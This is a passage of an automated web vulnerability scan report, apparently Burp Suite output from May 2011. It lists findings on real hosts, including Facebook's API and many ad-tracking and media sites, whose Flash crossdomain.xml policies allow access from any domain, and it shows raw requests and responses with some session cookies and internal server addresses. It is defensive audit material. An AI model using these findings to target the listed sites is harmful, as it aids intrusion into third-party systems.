7.3. http://api.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Fri, 03 Jun 2011 00:54:06 GMT
X-FB-Server: 10.42.3.67
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

7.4. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Thu, 05 May 2011 01:28:53 GMT
Date: Wed, 04 May 2011 01:28:53 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

7.5. http://cspix.media6degrees.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cspix.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Wed, 04 May 2011 01:12:33 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.6. http://external.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: external.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "a27e344a618640558cd334164e432db0:1247617934"
Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Wed, 04 May 2011 00:54:09 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.7. http://js.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Wed, 04 May 2011 01:28:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.8. http://ping.crowdscience.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ping.crowdscience.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ping.crowdscience.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:29:05 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Last-Modified: Tue, 26 Apr 2011 18:28:18 GMT
ETag: "764b6-e0-4a1d67cefb480"
Accept-Ranges: bytes
Content-Length: 224
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
       <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
       <cross-domain-policy>
               <allow-access-from domain="*" secure="false"/>
       
...[SNIP]...

7.9. http://pix04.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Wed, 04 May 2011 01:28:58 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.10. http://pixel.33across.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"211-1298012472000"
Last-Modified: Fri, 18 Feb 2011 07:01:12 GMT
Content-Type: application/xml
Content-Length: 211
Date: Wed, 04 May 2011 01:12:32 GMT
Connection: close
Server: 33XG1

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-doma
...[SNIP]...

7.11. http://pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 04 May 2011 01:28:58 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

7.12. http://pixel.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Thu, 05 May 2011 00:54:07 GMT
Content-Type: text/xml
Content-Length: 207
Date: Wed, 04 May 2011 00:54:07 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.13. http://secure-us.imrworldwide.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:28:53 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Wed, 11 May 2011 01:28:53 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

7.14. http://static.crowdscience.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.crowdscience.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.crowdscience.com

Response

HTTP/1.1 200 OK
Server: CacheFlyServe v26b
Date: Wed, 04 May 2011 01:28:53 GMT
Content-Type: text/xml
Connection: close
ETag: "2c600567b987cf9352b28a7f78e61b56"
X-CF1: fC.iad2:cf:cacheB.iad2-01
Content-Length: 224
Last-Modified: Mon, 15 Mar 2010 02:56:11 GMT
X-CF2: L
Accept-Ranges: bytes

<?xml version="1.0"?>
       <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
       <cross-domain-policy>
               <allow-access-from domain="*" secure="false"/>
       
...[SNIP]...

7.15. http://tags.bluekai.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:29:03 GMT
Last-Modified: Mon, 07 Mar 2011 20:46:41 GMT
ETag: "6f081a6-ca-49dea97c4ae40"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

7.16. http://tcr.tynt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tcr.tynt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tcr.tynt.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1800
Content-Type: text/xml
Date: Wed, 04 May 2011 01:28:53 GMT
ETag: "251523935"
Expires: Wed, 04 May 2011 01:58:53 GMT
Last-Modified: Tue, 10 Nov 2009 16:25:33 GMT
Server: EOS (lax001/283C)
Content-Length: 201
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.17. http://tracking.mediabarons.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tracking.mediabarons.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tracking.mediabarons.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:53:53 GMT
Server: Apache/2.2.14 (Unix) mod_apreq2-20051231/2.6.0
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Last-Modified: Mon, 14 Dec 2009 23:15:56 GMT
ETag: "1f50046-fb-47ab8749f2300"
Accept-Ranges: bytes
Content-Length: 251
Connection: close
Content-Type: application/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-http-request-headers-from domain="*" headers="*"/><allow-access-from domain="*" />
...[SNIP]...

7.18. http://trk.kissmetrics.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.kissmetrics.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: trk.kissmetrics.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 00:55:43 GMT
Content-Type: text/xml
Content-Length: 193
Last-Modified: Mon, 22 Nov 2010 19:18:08 GMT
Connection: close
Expires: Wed, 04 May 2011 02:55:43 GMT
Cache-Control: max-age=7200
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.19. http://www.1065.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.1065.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.1065.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3187350682 3187307471
X-Cache-Server: varnish04
Expires: Wed, 04 May 2011 01:01:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:01:15 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.20. http://www.3news.co.nz/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.3news.co.nz
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.3news.co.nz

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: BIGipServerWWW.3NEWS.CO.NZ=1097115840.20480.0000; path=/
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Type: text/xml
Last-Modified: Thu, 14 Dec 2006 12:00:00 GMT
Date: Wed, 04 May 2011 03:01:06 GMT
Content-Length: 205
ETag: "pv09c9997a2f4ee07c2035bd980ece35d4"
X-PvInfo: [S10203.C27177.A22962.RA0.G2725B.UC61C8D].[OT/xml.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.21. http://www.5ilthy.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.5ilthy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.5ilthy.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:00:40 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 15 Jun 2010 12:30:24 GMT
ETag: "2d7039c-138-48910c4f95800"
Accept-Ranges: bytes
Content-Length: 312
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
...[SNIP]...

7.22. http://www.7k7k.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.7k7k.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.7k7k.com

Response

HTTP/1.0 200 OK
Content-Length: 106
Content-Type: text/xml
Last-Modified: Tue, 03 Aug 2010 22:03:00 GMT
Accept-Ranges: bytes
ETag: "042ffa25733cb1:ae4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:57:51 GMT
Expires: Wed, 04 May 2011 08:56:19 GMT
Age: 3722
Powered-By-ChinaCache: HIT from USA-DA-1-3H2
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.23. http://www.98rock.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.98rock.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.98rock.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3189975117
X-Cache-Server: varnish04
Expires: Wed, 04 May 2011 02:22:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 02:22:58 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.24. http://www.abc.es/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abc.es
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.abc.es

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 28 Oct 2010 15:33:53 GMT
ETag: "61d0e986b576cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Expires: Wed, 04 May 2011 00:44:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 00:44:18 GMT
Content-Length: 153
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="*.chartbeat.com" />
</cross-domain-policy>

7.25. http://www.adammesh.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adammesh.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adammesh.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:20:32 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 27 Jan 2011 23:03:47 GMT
ETag: "16d2ac6-c9-f643dac0"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

7.26. http://www.adidasgolf.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adidasgolf.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adidasgolf.com

Response

HTTP/1.0 200 OK
Content-Length: 323
Content-Type: text/xml
Last-Modified: Thu, 03 Sep 2009 14:42:46 GMT
Accept-Ranges: bytes
ETag: "037ecda42cca1:2d60"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Wed, 04 May 2011 01:22:46 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control pe
...[SNIP]...

7.27. http://www.aggieathletics.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aggieathletics.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aggieathletics.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:03:12 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Last-Modified: Tue, 30 Mar 2010 22:03:47 GMT
ETag: "19daab3-34d-4bb27543"
Accept-Ranges: bytes
Content-Length: 845
Keep-Alive: timeout=300, max=1000
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.aggieathletics.com" />
<allow-access-from domain="blogs.aggieathletics.com" />
<allow-access-from domain="grfx.cstv.com" />
<allow-access-from domain="aggieathletics.com" />
<allow-access-from domain="sports.tamu.edu" />
<allow-access-from domain="sports-dev" />
<allow-access-from domain="sports-dev.tamu.edu" />
<allow-access-from domain="sports-admin.tamu.edu" />
<allow-access-from domain="lettermen.tamu.edu" />
<allow-access-from domain="*.tamu.edu" />
<allow-access-from domain="*.aggieathletics.com" />
<allow-access-from domain="128.194.236.64" />
<allow-access-from domain="127.0.0.1" />
<allow-access-from domain="*" />
<allow-access-from domain="*.rustedwheelmedia.com" />
...[SNIP]...

7.28. http://www.allamericanblogger.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.allamericanblogger.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.allamericanblogger.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:57:27 GMT
Server: Apache
Connection: close
Content-Type: text/xml; charset=UTF-8

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

7.29. http://www.alltrailers.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.alltrailers.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and uses a wildcard to specify allowed domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.alltrailers.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:37:00 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
Last-Modified: Thu, 03 Mar 2011 13:35:48 GMT
ETag: "10c017-182-49d941b71b500"
Accept-Ranges: bytes
Content-Length: 386
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.alltrailers.net" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*" to-ports="*" />
...[SNIP]...

7.30. http://www.ally.ca/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ally.ca
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ally.ca

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:19:01 GMT
Server:
Set-Cookie: TLTSID=7E59B71875EC10750029D733D9763C3B; Path=/; Domain=.ally.ca
Set-Cookie: TLTUID=7E59B71875EC10750029D733D9763C3B; Path=/; Domain=.ally.ca; Expires=Wed, 04-05-2021 01:19:01 GMT
HostName: TORGMLCORWB08
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=55EB3F6635694656AD86AE4DB6786D1E; Path=/
Connection: close
Content-Type: text/xml;charset=UTF-8

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</c
...[SNIP]...

7.31. http://www.amplify.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.amplify.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.amplify.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:59:51 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 21 Mar 2011 19:36:23 GMT
ETag: "34c9808-d9-49f033e225bc0"
Accept-Ranges: bytes
Content-Length: 217
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
